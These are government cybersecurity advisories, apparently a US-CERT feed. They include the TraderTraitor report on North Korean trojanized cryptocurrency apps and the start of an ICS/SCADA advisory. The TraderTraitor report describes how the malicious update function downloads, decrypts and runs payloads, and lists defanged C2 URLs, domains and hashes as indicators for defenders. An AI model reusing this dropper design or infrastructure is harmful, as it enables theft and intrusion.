  5. Consider soliciting support from a third-party IT organization to provide subject matter expertise, ensure the actor is eradicated from the network, and avoid residual issues that could enable follow-on exploitation.
  6. Report incidents to appropriate cyber and law enforcement authorities:
  • U.S organizations: share information about incidents and anomalous activity to CISA’s 24/7 Operations Center at report@cisa.gov or (888) 282-0870 and/or the FBI via your local FBI field office or the FBI’s 24/7 CyWatch at (855) 292-3937 or CyWatch@fbi.gov. For ransomware incidents, organizations can also report to the U.S. Secret Service via a U.S. Secret Service Field Office
  • Australian organizations: if you have questions about this advice or have indications that your environment has been compromised, call the ACSC at 1300 CYBER1 (1300 292 371). To report an incident see cyber.gov.au/acsc/report.
  • Canadian organizations: report incidents by emailing CCCS at contact@cyber.gc.ca.
  • New Zealand organizations: if your organization requires assistance from the National Cyber Security Centre, contact them directly via telephone at (04) 498-7654 or via email at ncscincidents@ncsc.govt.nz.
  • UK organizations: report a significant cybersecurity incident at ncsc.gov.uk/report-an-incident (monitored 24 hours) or, for urgent assistance, call 03000 200 973.

For additional guidance on responding to a ransomware incident, see the CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide.

See the joint advisory from Australia, Canada, New Zealand, the United Kingdom, and the United States on Technical Approaches to Uncovering and Remediating Malicious Activity for guidance on hunting or investigating a network, and for common mistakes in incident handling.

Additionally, CISA, the FBI, and NSA encourage U.S. critical infrastructure owners and operators to see CISA’s Federal Government Cybersecurity Incident and Vulnerability Response Playbooks. Although tailored to federal civilian branch agencies, these playbooks provide operational procedures for planning and conducting cybersecurity incident and vulnerability response activities and detail each step for both incident and vulnerability response.  

Note: U.S., Australian, Canadian, New Zealand, and UK cyber authorities strongly discourage paying a ransom to criminal actors. Paying a ransom may embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Paying the ransom does not guarantee that a victim’s files will be recovered.

RESOURCES DISCLAIMER

The information you have accessed or received is being provided “as is” for informational purposes only. CISA, NSA, FBI, ACSC, CCCS, NZ NCSC, NCSC-UK, and the UK National Crime Agency (NCA) do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring.

TRADEMARK RECOGNITION

MITRE and ATT&CK are registered trademarks of The MITRE Corporation. Kubernetes is a registered trademark of The Linux Foundation.

PURPOSE 

This document was developed by U.S., Australian, Canadian, New Zealand, and UK cybersecurity authorities in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations.

REFERENCES

[1] Cybersecurity and Infrastructure Security Agency
[2] Federal Bureau of Investigation
[3] National Security Agency
[4] Australian Cyber Security Centre
[5] Canadian Centre for Cyber Security
[6] New Zealand's National Cyber Security Centre
[7] United Kingdom's National Cyber Security Centre
[8] United Kingdom's National Crime Agency
[9] U.S. DOJ Press Release: U.S. Charges Russian FSB Officers and Their Criminal Conspirators for Hacking Yahoo and Millions of Email Accounts
[10] U.S. DOJ Press Release: Four Russian Government Employees Charged in Two Historical Hacking Campaigns Targeting Critical Infrastructure Worldwide
[11] CrowdStrike Blog: Early Bird Catches the Wormhole: Observations from the StellarParticle Campaign
[12] U.S. White House Statement: FACT SHEET: Imposing Costs for Harmful Foreign Activities by the Russian
[
13] Government of Canada Statement on SolarWinds Cyber Compromise
[14] UK Government Press Release: Russia: UK and US expose global campaign of malign activity by Russian intelligence services
[15] MITRE ATT&CK: APT29
[
16] Joint CSA Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware
[17] Joint CSA Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments
[18] MITRE ATT&CK APT28
[19] Joint CSA New Sandworm Malware Cyclops Blink Replaces VPNFilter
[20] UK Government Press Release: UK condemns Russia's GRU over Georgia cyber-attacks
[21] U.S. Department of State, Press Statement: The United States Condemns Russian Cyber Attack Against the Country of Georgia
[22] Government of Canada CSE Statement on Malicious Russian Cyber Activity Targeting Georgia
[23] UK Government Press Release: UK condemns Russia's GRU over Georgia cyber-attacks
[24] MITRE ATT&CK The Sandworm Team
[25] U.S. Department of the Treasury Press Release: Treasury Sanctions Russian Government Research Institution Connected to the Triton Malware
[26] UK Government Press Release: UK exposes Russian spy agency behind cyber incident
[27] U.S. DOJ Press Release: Four Russian Government Employees Charged in Two Historical Hacking Campaigns Targeting Critical Infrastructure Worldwide
[28] MITRE ATT&CK TEMP.Veles
[29] NSA and NCSC-UK Cybersecurity Advisory Turla Group Exploits Iranian APT To Expand Coverage Of Victims
[30] CrowdStrike Adversary Profile: VENEMOUS BEAR
[31] KELA Cybersecurity Intelligence Center: Ain’t No Actor Trustworthy Enough: The importance of validating sources
[32] Twitter: Valery Marchive Status, Feb. 25, 2022 1:41 PM
[33] The Record by Recorded Future: Russia or Ukraine: Hacking Groups Take Sides
[34] Twitter: CyberKnow Status, March 29, 2022, 7:54 AM
[35] CrowdStrike Blog: Who is Salty Spider (Sality)?
[36] Proofpoint Blog: New Year, New Version of DanaBot
[37] Zscaler Blog: Spike in DanaBot Malware Activity
[38] Proofpoint Blog: New Year, New Version of DanaBot
[39] The Record by Recorded Future: Russia or Ukraine: Hacking Groups Take Sides
[40] TechTarget: Conti ransomware gang backs Russia, threatens US
[41] The Record by Recorded Future: Russia or Ukraine: Hacking Groups Take Sides

ACKNOWLEDGEMENTS

The U.S., Australian, Canadian, New Zealand, and UK cyber authorities would like to thank CrowdStrike, Google, LookingGlass Cyber, Mandiant, Microsoft, and Secureworks for their contributions to this CSA.

Contact Information

U.S. organizations: to report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact CISA’s 24/7 Operations Center at report@cisa.gov or (888) 282-0870 and/or to the FBI via your local FBI field office at www.fbi.gov/contact-us/field-offices, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by email at CyWatch@fbi.gov. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. For NSA client requirements or general cybersecurity inquiries, contact the Cybersecurity Requirements Center at 410-854-4200 or Cybersecurity_Requests@nsa.gov. Australian organizations: visit cyber.gov.au/acsc/report or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and access alerts and advisories. Canadian organizations: report incidents by emailing CCCS at contact@cyber.gc.ca. New Zealand organizations: report cyber security incidents to ncscincidents@ncsc.govt.nz or call 04 498 7654. United Kingdom organizations: report a significant cyber security incident: ncsc.gov.uk/report-an-incident (monitored 24 hours) or, for urgent assistance, call 03000 200 973.

Revisions
  • April 20, 2022: Initial version
  • May 9, 2022: Added detail on GTsST use of VPNFilter.

This product is provided subject to this Notification and this Privacy & Use policy.

Categories: Security Alerts

AA22-108A: TraderTraitor: North Korean State-Sponsored APT Targets Blockchain Companies

US-CERT Security Alerts - Mon, 04/18/2022 - 05:38
Original release date: April 18, 2022 | Last revised: April 20, 2022
Summary

Actions to take today to mitigate cyber threats to cryptocurrency:
Patch all systems.
• Prioritize patching known exploited vulnerabilities.
• Train users to recognize and report phishing attempts.
• Use multifactor authentication.

The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the U.S. Treasury Department (Treasury) are issuing this joint Cybersecurity Advisory (CSA) to highlight the cyber threat associated with cryptocurrency thefts and tactics used by a North Korean state-sponsored advanced persistent threat (APT) group since at least 2020. This group is commonly tracked by the cybersecurity industry as Lazarus Group, APT38, BlueNoroff, and Stardust Chollima. For more information on North Korean state-sponsored malicious cyber activity, visit https://www.us-cert.cisa.gov/northkorea.

The U.S. government has observed North Korean cyber actors targeting a variety of organizations in the blockchain technology and cryptocurrency industry, including cryptocurrency exchanges, decentralized finance (DeFi) protocols, play-to-earn cryptocurrency video games, cryptocurrency trading companies, venture capital funds investing in cryptocurrency, and individual holders of large amounts of cryptocurrency or valuable non-fungible tokens (NFTs). The activity described in this advisory involves social engineering of victims using a variety of communication platforms to encourage individuals to download trojanized cryptocurrency applications on Windows or macOS operating systems. The cyber actors then use the applications to gain access to the victim’s computer, propagate malware across the victim’s network environment, and steal private keys or exploit other security gaps. These activities enable additional follow-on activities that initiate fraudulent blockchain transactions.

The U.S. government previously published an advisory about North Korean state-sponsored cyber actors using AppleJeus malware to steal cryptocurrency: AppleJeus: Analysis of North Korea’s Cryptocurrency Malware. The U.S. government has also previously published advisories about North Korean state-sponsored cyber actors stealing money from banks using custom malware:

This advisory provides information on tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to stakeholders in the blockchain technology and cryptocurrency industry to help them identify and mitigate cyber threats against cryptocurrency. 

Click here for a PDF version of this report. 

Click here for STIX.

Technical DetailsThreat Update

The U.S. government has identified a group of North Korean state-sponsored malicious cyber actors using tactics similar to the previously identified Lazarus Group (see AppleJeus: Analysis of North Korea’s Cryptocurrency Malware). The Lazarus Group used AppleJeus trojanized cryptocurrency applications targeting individuals and companies—including cryptocurrency exchanges and financial services companies—through the dissemination of cryptocurrency trading applications that were modified to include malware that facilitates theft of cryptocurrency. As of April 2022, North Korea’s Lazarus Group actors have targeted various firms, entities, and exchanges in the blockchain and cryptocurrency industry using spearphishing campaigns and malware to steal cryptocurrency. These actors will likely continue exploiting vulnerabilities of cryptocurrency technology firms, gaming companies, and exchanges to generate and launder funds to support the North Korean regime. 

Tactics, Techniques and Procedures

Intrusions begin with a large number of spearphishing messages sent to employees of cryptocurrency companies—often working in system administration or software development/IT operations (DevOps)—on a variety of communication platforms. The messages often mimic a recruitment effort and offer high-paying jobs to entice the recipients to download malware-laced cryptocurrency applications, which the U.S. government refers to as "TraderTraitor."

The term TraderTraitor describes a series of malicious applications written using cross-platform JavaScript code with the Node.js runtime environment using the Electron framework. The malicious applications are derived from a variety of open-source projects and purport to be cryptocurrency trading or price prediction tools. TraderTraitor campaigns feature websites with modern design advertising the alleged features of the applications (see figure 1).

 

Figure 1: Screenshot of CryptAIS website

The JavaScript code providing the core functions of the software is bundled with Webpack. Within the code is a function that purports to be an “update,” with a name such as UpdateCheckSync(), that downloads and executes a malicious payload (see figure 2). 

The update function makes an HTTP POST request to a PHP script hosted on the TraderTraitor project’s domain at either the endpoint /update/ or /oath/checkupdate.php. In recent variants, the server’s response is parsed as a JSON document with a key-value pair, where the key is used as an AES 256 encryption key in Cipher Block Chaining (CBC) or Counter (CTR) mode to decrypt the value. The decrypted data is written as a file to the system’s temporary directory, as provided by the os.tmpdir() method of Node.js, and executed using the child_process.exec() method of Node.js, which spawns a shell as a child process of the current Electron application. The text “Update Finished” is then logged to the shell for the user to see.

Observed payloads include updated macOS and Windows variants of Manuscrypt, a custom remote access trojan (RAT), that collects system information and has the ability to execute arbitrary commands and download additional payloads (see North Korean Remote Access Tool: COPPERHEDGE). Post-compromise activity is tailored specifically to the victim’s environment and at times has been completed within a week of the initial intrusion.  

 

Figure 2: Screenshot depicting the UpdateCheckSync() and supporting functions bundled within 60b3cfe2ec3100caf4afde734cfd5147f78acf58ab17d4480196831db4aa5f18 associated with DAFOM

Indicators of Compromise

DAFOM
DAFOM purports to be a “cryptocurrency portfolio application.” A Mach-O binary packaged within the Electron application was signed by an Apple digital signature issued for the Apple Developer Team W58CYKFH67. The certificate associated with Apple Developer Team W58CYKFH67 has been revoked. A metadata file packaged in the DAFOM application provided the URL hxxps://github[.]com/dafomdev for bug reports. As of April 2022, this page was unavailable.

 

dafom[.]dev

Information as of February 2022:
IP Address: 45.14.227[.]58
Registrar: NameCheap, Inc.
Created: February 7, 2022
Expires: February 7, 2023

 

60b3cfe2ec3100caf4afde734cfd5147f78acf58ab17d4480196831db4aa5f18

Tags: dropper macos
Name: DAFOM-1.0.0.dmg
Size: 87.91 MB (92182575 bytes)
MD5: c2ea5011a91cd59d0396eb4fa8da7d21
SHA-1: b2d9ca7b6d1bbbe4864ea11dfca343b7e15597d8
SHA-256: 60b3cfe2ec3100caf4afde734cfd5147f78acf58ab17d4480196831db4aa5f18
ssdeep: 1572864:LGLBnolF9kPEiKOabR2QEs1B1/LuUQrbecE6Xwijkca/pzpfaLtIP:LGVnoT9kPZK9tVEwBxWbecR5Faxzpf0M

 

TokenAIS
TokenAIS purports to help “build a portfolio of AI-based trading” for cryptocurrencies. Mach-O binaries packaged within the Electron application contained an Apple digital signature issued for the Apple Developer Team RN4BTXA4SA. The certificate associated with Apple Developer Team RN4BTXA4SA has been revoked. The application requires users to “register” an account by entering an email address and a password to use its features. The malicious TraderTraitor code is a Node.js function called UpdateCheckSync() located in a file named update.js, which is bundled in a file called renderer.prod.js, which is in an archive called app.asar. This function passes the email address that the user provided and the system platform to the C2 server, decrypts the response using AES 256 in CBC mode with the hardcoded initialization vector (IV) !@34QWer%^78TYui and a key provided in the response, then writes the decrypted data to a file and executes it in a new shell.

 

tokenais[.]com

Information as of January 2022:
IP Address: 199.188.103[.]115
Registrar: NameCheap, Inc.
Created: January 27, 2022
Expires: January 27, 2023

 

5b40b73934c1583144f41d8463e227529fa7157e26e6012babd062e3fd7e0b03

Tags: dropper macos
Name: TokenAIS.app.zip
Size: 118.00 MB (123728267 bytes)
MD5: 930f6f729e5c4d5fb52189338e549e5e
SHA-1: 8e67006585e49f51db96604487138e688df732d3
SHA-256: 5b40b73934c1583144f41d8463e227529fa7157e26e6012babd062e3fd7e0b03
ssdeep: 3145728:aMFJlKVvw4+zLruAsHrmo5Vvw4+zLruAsHrmob0dC/E:aUlKtw4+/r2HNtw4+/r2HnMCM

 

CryptAIS
CryptAIS uses the same language as TokenAIS to advertise that it “helps build a portfolio of AI-based trading.” It is distributed as an Apple Disk Image (DMG) file that is digitally signed by an Apple digital signature issued for the Apple Developer Team CMHD64V5R8. The certificate associated with Apple Developer Team CMHD64V5R8 has been revoked. The application requires users to “register” an account by entering an email address and a password to use its features. The malicious TraderTraitor code is a Node.js function called UpdateCheckSync() located in a file named update.js, which is bundled in a file called renderer.prod.js, which is in an archive called app.asar. This function passes the email address that the user provided and the system platform to the C2 server, decrypts the response using AES 256 in CTR mode and a key provided in the response, then writes the decrypted data to a file and executes it in a new shell.

 

cryptais[.]com

Information as of August 2021:
IP Address: 82.102.31.14
Registrar: NameCheap, Inc.
Created: August 2, 2021
Expires: August 2, 2022

 

f0e8c29e3349d030a97f4a8673387c2e21858cccd1fb9ebbf9009b27743b2e5b

Tags: dropper macos
Name: CryptAIS[.]dmg
Size: 80.36 MB (84259810 bytes)
MD5: 4e5ebbecd22c939f0edf1d16d68e8490
SHA-1: f1606d4d374d7e2ba756bdd4df9b780748f6dc98
SHA-256: f0e8c29e3349d030a97f4a8673387c2e21858cccd1fb9ebbf9009b27743b2e5b
ssdeep: 1572864:jx9QOwiLDCUrJXsKMoGTwiCcKFI8jmrvGqjL2hX6QklBmrZgkZjMz+dPSpR0Xcpk:F9QOTPCUrdsKEw3coIg2Or6XBmrZgkZw

 

AlticGO
AlticGO was observed packaged as Nullsoft Scriptable Install System (NSIS) Windows executables that extracted an Electron application packaged for Windows. These executables contain a simpler version of TraderTraitor code in a function exported as UpdateCheckSync() located in a file named update.js, which is bundled in renderer.prod.js, which is in the app.asar archive. The function calls an external function located in a file node_modules/request/index.js bundled in renderer.prod.js to make an HTTP request to hxxps://www.alticgo[.]com/update/. One AlticGO sample, e3d98cc4539068ce335f1240deb1d72a0b57b9ca5803254616ea4999b66703ad, instead contacts hxxps://www.esilet[.]com/update/ (see below for more information about Esilet). Some image resources bundled with the application included the CreAI Deck logo (see below for more information about CreAI Deck). The response is written to disk and executed in a new shell using the child_process.exec() method in Node.js. Unlike newer versions of TraderTraitor, there is no mechanism to decrypt a payload.

 

alticgo[.]com

Information as of August 2020:
IP Address: 108.170.55[.]202
Registrar: NetEarth One Inc.
Created: August 8, 2020
Expires: August 8, 2021

 

765a79d22330098884e0f7ce692d61c40dfcf288826342f33d976d8314cfd819

Tags: dropper peexe nsis
Name: AlticGO.exe
Size: 43.54 MB (45656474 bytes)
MD5: 1c7d0ae1c4d2c0b70f75eab856327956
SHA-1: f3263451f8988a9b02268f0fb6893f7c41b906d9
SHA-256: 765a79d22330098884e0f7ce692d61c40dfcf288826342f33d976d8314cfd819
ssdeep: 786432:optZmVDkD1mZ1FggTqqLGAU6JXnjmDQ4YBXpleV0RnJYJKoSuDySLGh7yVPUXi7:opzKDginspAU6JXnJ46X+eC6cySihWVX
Compilation timestamp: 2018-12-15 22:26:14 UTC

 

e3d98cc4539068ce335f1240deb1d72a0b57b9ca5803254616ea4999b66703ad

Tags: dropper peexe nsis
Name: AlticGO_R.exe
Size: 44.58 MB (46745505 bytes)
MD5: 855b2f4c910602f895ee3c94118e979a
SHA-1: ff17bd5abe9f4939918f27afbe0072c18df6db37
SHA-256: e3d98cc4539068ce335f1240deb1d72a0b57b9ca5803254616ea4999b66703ad
ssdeep: 786432:LptZmVDkD1mQIiXUBkRbWGtqqLGAU6JXnjmDQ4YBXpleV0RnJYJKoSuDySLGh7yH:LpzKDgzRpWGwpAU6JXnJ46X+eC6cySiI
Compilation timestamp: 2020-02-12 16:15:17 UTC

 

8acd7c2708eb1119ba64699fd702ebd96c0d59a66cba5059f4e089f4b0914925

Tags: dropper peexe nsis
Name: AlticGO.exe
Size: 44.58 MB (46745644 bytes)
MD5: 9a6307362e3331459d350a201ad66cd9
SHA-1: 3f2c1e60b5fac4cf1013e3e1fc688be490d71a84
SHA-256: 8acd7c2708eb1119ba64699fd702ebd96c0d59a66cba5059f4e089f4b0914925
ssdeep: 786432:AptZmVDkD1mjPNDeuxOTKQqqLGAU6JXnjmDQ4YBXpleV0RnJYJKoSuDySLGh7yV7:ApzKDgqPxeuLpAU6JXnJ46X+eC6cySiG
Compilation timestamp: 2020-02-12 16:15:17 UTC

 

Esilet
Esilet claims to offer live cryptocurrency prices and price predictions. It contains a simpler version of TraderTraitor code in a function exported as UpdateCheckSync() located in a file named update.js, which is bundled in renderer.prod.js, which is in the app.asar archive. The function calls an external function located in a file node_modules/request/index.js bundled in renderer.prod.js to make an HTTP request to hxxps://www.esilet[.]com/update/. The response is written to disk and executed in a new shell using the child_process.exec() method in Node.js. Unlike newer versions of TraderTraitor, there is no mechanism to decrypt a payload. Esilet has been observed delivering payloads of at least two different macOS variants of Manuscrypt, 9d9dda39af17a37d92b429b68f4a8fc0a76e93ff1bd03f06258c51b73eb40efa and dced1acbbe11db2b9e7ae44a617f3c12d6613a8188f6a1ece0451e4cd4205156. 

 

Figure 3: Screenshot of the UpdateCheckSync() function in Esilet

esilet[.]com

Information as of June 2020:
IP Address: 104.168.98[.]156
Registrar: NameSilo, LLC
Created: June 12, 2020
Expires: June 12, 2021

 

greenvideo[.]nl

Likely legitimate but compromised. Information as of April 2022:
IP Address: 62.84.240[.]140
Registrar: Flexwebhosting
Created: February 26, 2018
Expires: Unknown

 

dafnefonseca[.]com

Likely legitimate but compromised. Information as of June 2020:
IP Address: 151.101.64[.]119
Registrar: PublicDomainRegistry Created: August 27, 2019
Expires: August 27, 2022

 

haciendadeclarevot[.]com

Likely legitimate but compromised. Information as of June 2020:
IP Address: 185.66.41[.]17
Registrar: cdmon, 10DENCEHISPAHARD, S.L.
Created: March 2, 2005
Expires: March 2, 2023

 

sche-eg[.]org

Likely legitimate but compromised. Information as of June 2020:
IP Address: 160.153.235[.]20
Registrar: GoDaddy.com, LLC
Created: June 1, 2019
Expires: June 1, 2022

 

www.vinoymas[.]ch

Likely legitimate but compromised. Information as of June 2020:
IP Address: 46.16.62[.]238
Registrar: cdmon, 10DENCEHISPAHARD, S.L.
Created: January 24, 2010
Expires: Unknown

 

infodigitalnew[.]com

Likely legitimate but compromised. Information as of June 2020:
IP Address: 107.154.160[.]132
Registrar: PublicDomainRegistry
Created: June 20, 2020
Expires: June 20, 2022

 

9ba02f8a985ec1a99ab7b78fa678f26c0273d91ae7cbe45b814e6775ec477598

Tags: dropper macos
Name: Esilet.dmg
Size: 77.90 MB (81688694 bytes) MD5: 53d9af8829a9c7f6f177178885901c01
SHA-1: ae9f4e39c576555faadee136c6c3b2d358ad90b9 SHA-256: 9ba02f8a985ec1a99ab7b78fa678f26c0273d91ae7cbe45b814e6775ec477598
ssdeep: 1572864:lffyoUnp5xmHVUTd+GgNPjFvp4YEbRU7h8cvjmUAm4Du73X0unpXkU:lfqHBmHo+BPj9CYEshLqcuAX0I0

 

9d9dda39af17a37d92b429b68f4a8fc0a76e93ff1bd03f06258c51b73eb40efa

Tags: trojan macho
Name: Esilet-tmpzpsb3
Size: 510.37 KB (522620 bytes)
MD5: 1ca31319721740ecb79f4b9ee74cd9b0
SHA-1: 41f855b54bf3db621b340b7c59722fb493ba39a5 SHA-256: 9d9dda39af17a37d92b429b68f4a8fc0a76e93ff1bd03f06258c51b73eb40efa
ssdeep: 6144:wAulcT94T94T97zDj1I/BkjhkbjZ8bZ87ZMSj71obV/7NobNo7NZTb7hMT5ETZ8I:wDskT1UBg2lirFbpR9mJGpmN C2 Endpoints:

  • hxxps://greenvideo[.]nl/wp-content/themes/top.php
  • hxxps://dafnefonseca[.]com/wp-content/themes/top.php
  • hxxps://haciendadeclarevot[.]com/wp-content/top.php

 

dced1acbbe11db2b9e7ae44a617f3c12d6613a8188f6a1ece0451e4cd4205156

Tags: trojan macho
Name: Esilet-tmpg7lpp Size: 38.24 KB (39156 bytes)
MD5: 9578c2be6437dcc8517e78a5de1fa975
SHA-1: d2a77c31c3e169bec655068e96cf4e7fc52e77b8
SHA-256: dced1acbbe11db2b9e7ae44a617f3c12d6613a8188f6a1ece0451e4cd4205156
ssdeep: 384:sdaWs0fDTmKnY4FPk6hTyQUitnI/kmCgr7lUryESll4yg9RpEwrUifJ8ttJOdy:sdayCkY4Fei9mhy/L9RBrny6y

C2 Endpoints: 

  • hxxps://sche-eg[.]org/plugins/top.php
  • hxxps://www.vinoymas[.]ch/wp-content/plugins/top.php
  • hxxps://infodigitalnew[.]com/wp-content/plugins/top.php

 

CreAI Deck
CreAI Deck claims to be a platform for “artificial intelligence and deep learning.” No droppers for it were identified, but the filenames of the below samples, win32.bin and darwin64.bin, match the naming conventions used by other versions of TraderTraitor when downloading a payload. Both are samples of Manuscrypt that contact hxxps://aideck[.]net/board.php for C2 using HTTP POST requests with multipart/form-data Content-Types.

 

creaideck[.]com

Information as of March 2020:
IP Address: 38.132.124[.]161
Registrar: NameCheap, Inc.
Created: March 9, 2020
Expires: March 9, 2021

 

aideck[.]net

Information as of June 2020:
IP Address: 89.45.4[.]151
Registrar: NameCheap, Inc.
Created: June 22, 2020
Expires: June 22, 2021

 

867c8b49d29ae1f6e4a7cd31b6fe7e278753a1ba03d4be338ed11fd1efc7dd36

Tags: trojan peexe
Name: win32.bin
Size: 2.10 MB (2198684 bytes)
MD5: 5d43baf1c9e9e3a939e5defd8f8fbd8d
SHA-1: d5ff73c043f3bb75dd749636307500b60a436550 SHA-256: 867c8b49d29ae1f6e4a7cd31b6fe7e278753a1ba03d4be338ed11fd1efc7dd36
ssdeep: 24576:y3SY+/2M3BMr7cdgSLBjbr4nzzy95VV7cEXV:ESZ2ESrHSV3D95oA
Compilation timestamp: 2020-06-23 06:06:35 UTC

 

89b5e248c222ebf2cb3b525d3650259e01cf7d8fff5e4aa15ccd7512b1e63957

Tags: trojan macho
Name: darwin64.bin
Size: 6.44 MB (6757832 bytes)
MD5: 8397ea747d2ab50da4f876a36d673272
SHA-1: 48a6d5141e25b6c63ad8da20b954b56afe589031
SHA-256: 89b5e248c222ebf2cb3b525d3650259e01cf7d8fff5e4aa15ccd7512b1e63957
ssdeep: 49152:KIH1kEh7zIXlDYwVhb26hRKtRwwfs62sRAdNhEJNDvOL3OXl5zpF+FqBNihzTvff:KIH1kEhI1LOJtm2spB

Mitigations

North Korean state-sponsored cyber actors use a full array of tactics and techniques to exploit computer networks of interest, acquire sensitive cryptocurrency-intellectual property, and gain financial assets. The U.S. government recommends implementing mitigations to protect critical infrastructure organizations as well as financial sector organizations in the blockchain technology and cryptocurrency industry.

  • Apply defense-in-depth security strategy. Apply security principles—such as least access models and defense-in-depth—to user and application privileges to help prevent exploitation attempts from being successful. Use network segmentation to separate networks into zones based on roles and requirements. Separate network zones can help prevent lateral movement throughout the organization and limit the attack surface. See NSA’s Top Ten Cybersecurity Mitigation Strategies for strategies enterprise organizations should use to build a defense-in-depth security posture. 
  • Implement patch management. Initial and follow-on exploitation involves leveraging common vulnerabilities and exposures (CVEs) to gain access to a networked environment. Organizations should have a timely vulnerability and patch management program in place to mitigate exposure to critical CVEs. Prioritize patching of internet-facing devices and monitored accordingly for any malicious logic attacks. 
  • Enforce credential requirements and multifactor authentication. North Korean malicious cyber actors continuously target user credentials, email, social media, and private business accounts. Organizations should ensure users change passwords regularly to reduce the impact of password spraying and other brute force techniques. The U.S. government recommends organizations implement and enforce multifactor authentication (MFA) to reduce the risk of credential theft. Be aware of MFA interception techniques for some MFA implementations and monitor for anomalous logins.
  • Educate users on social engineering on social media and spearphishing. North Korean actors rely heavily on social engineering, leveraging email and social media platforms to build trust and send malicious documents to unsuspecting users. A cybersecurity aware workforce is one of the best defenses against social engineering techniques like phishing. User training should include how to identify social engineering techniques and awareness to only open links and attachments from trusted senders.
  • Implement email and domain mitigations. Maintain awareness of themed emails surrounding current events. Malicious cyber actors use current events as lure for potential victims as observed during the COVID-19 pandemic. Organizations should have a robust domain security solution that includes leveraging reputation checks and closely monitoring or blocking newly registered domains (NRDs) in enterprise traffic. NRDs are commonly established by threat actors prior to malicious engagement.
    • HTML and email scanning. Organizations should disable HTML from being used in emails and scan email attachments. Embedded scripts may be hard for an antivirus product to detect if they are fragmented. An additional malware scanning interface product can be integrated to combine potentially malicious payloads and send the payload to the primary antivirus product. Hyperlinks in emails should also be scanned and opened with precautionary measures to reduce the likelihood of a user clicking on a malicious link.
  • Endpoint protection. Although network security is critical, devices mobility often means traveling and connecting to multiple different networks that offer varying levels of security. To reduce the risk of introducing exposed hosts to critical networks, organizations should ensure mobile devices have installed security suites to detect and mitigate malware. 
  • Enforce application security. Application allowlisting enables the organization to monitor programs and only allow those on the approved allowlist to execute. Allowlisting helps to stop the initial attack, even if the user clicks a malicious link or opens a malicious attachment. Implement baseline rule sets, such as NSA’s Limiting Location Data Exposure guidance, to block execution of unauthorized or malicious programs.
    • Disable macros in office products. Macros are a common method for executing code through an attached office document. Some office products allow for the disabling of macros that originate from outside of the organization, providing a hybrid approach when the organization depends on the legitimate use of macros.
      • Windows specific settings can be configured to block internet-originated macros from running. This can be done in the Group Policy Administrative Templates for each of the associated Office products (specifically Word, Excel and PowerPoint). Other productivity software, such as LibreOffice and OpenOffice, can be configured to set the Macro Security Level.
  • Be aware of third-party downloads—especially cryptocurrency applications. North Korean actors have been increasingly active with currency generation operations. Users should always verify file downloads and ensure the source is from a reputable or primary (preferred) source and not from a third-party vendor. Malicious cyber actors have continuously demonstrated the ability to trojanize applications and gain a foothold on host devices.
  • Create an incident response plan to respond to possible cyber intrusions. The plan should include reporting incidents to both the FBI and CISA—quick reporting can reduce the severity of incidents and provide valuable information to investigators. Contact information can be found below. 
Contact 

All organizations should report incidents and anomalous activity to CISA 24/7 Operations Center at report@cisa.gov or (888) 282-0870 and/or to the FBI via your local FBI field office or the FBI’s 24/7 CyWatch at (855) 292-3937 or CyWatch@fbi.gov.

Disclaimer

The information in this advisory is provided "as is" for informational purposes only. The FBI, CISA, and Treasury do not provide any warranties of any kind regarding this information or endorse any commercial product or service, including any subjects of analysis.
 

Revisions
  • Initial Version: April 18, 2022

This product is provided subject to this Notification and this Privacy & Use policy.

Categories: Security Alerts

AA22-103A: APT Cyber Tools Targeting ICS/SCADA Devices

US-CERT Security Alerts - Wed, 04/13/2022 - 09:00
Original release date: April 13, 2022 | Last revised: April 14, 2022
Summary

Actions to Take Today to Protect ICS/SCADA Devices:
• Enforce multifactor authentication for all remote access to ICS networks and devices whenever possible.
• Change all passwords to ICS/SCADA devices and systems on a consistent schedule, especially all default passwords, to device-unique strong passwords to mitigate password brute force attacks and to give defender monitoring systems opportunities to detect common attacks.
• Leverage a properly installed continuous OT monitoring solution to log and alert on malicious indicators and behaviors.

The Department of Energy (DOE), the Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), and the Federal Bureau of Investigation (FBI) are releasing this joint Cybersecurity Advisory (CSA) to warn that certain advanced persistent threat (APT) actors have exhibited the capability to gain full system access to multiple industrial control system (ICS)/supervisory control and data acquisition (SCADA) devices, including:

  • Schneider Electric programmable logic controllers (PLCs),
  • OMRON Sysmac NEX PLCs, and
  • Open Platform Communications Unified Architecture (OPC UA) servers.

The APT actors have developed custom-made tools for targeting ICS/SCADA devices. The tools enable them to scan for, compromise, and control affected devices once they have established initial access to the operational technology (OT) network. Additionally, the actors can compromise Windows-based engineering workstations, which may be present in information technology (IT) or OT environments, using an exploit that compromises an ASRock motherboard driver with known vulnerabilities. By compromising and maintaining full system access to ICS/SCADA devices, APT actors could elevate privileges, move laterally within an OT environment, and disrupt critical devices or functions.

DOE, CISA, NSA, and the FBI urge critical infrastructure organizations, especially Energy Sector organizations, to implement the detection and mitigation recommendations provided in this CSA to detect potential malicious APT activity and harden their ICS/SCADA devices. 

Click here for a PDF version of this report. 

Technical Details

APT actors have developed custom-made tools that, once they have established initial access in an OT network, enables them to scan for, compromise, and control certain ICS/SCADA devices, including the following:

  • Schneider Electric MODICON and MODICON Nano PLCs, including (but may not be limited to) TM251, TM241, M258, M238, LMC058, and LMC078;
  • OMRON Sysmac NJ and NX PLCs, including (but may not be limited to) NEX NX1P2, NX-SL3300, NX-ECC203, NJ501-1300, S8VK, and R88D-1SN10F-ECT; and 
  • OPC Unified Architecture (OPC UA) servers.  

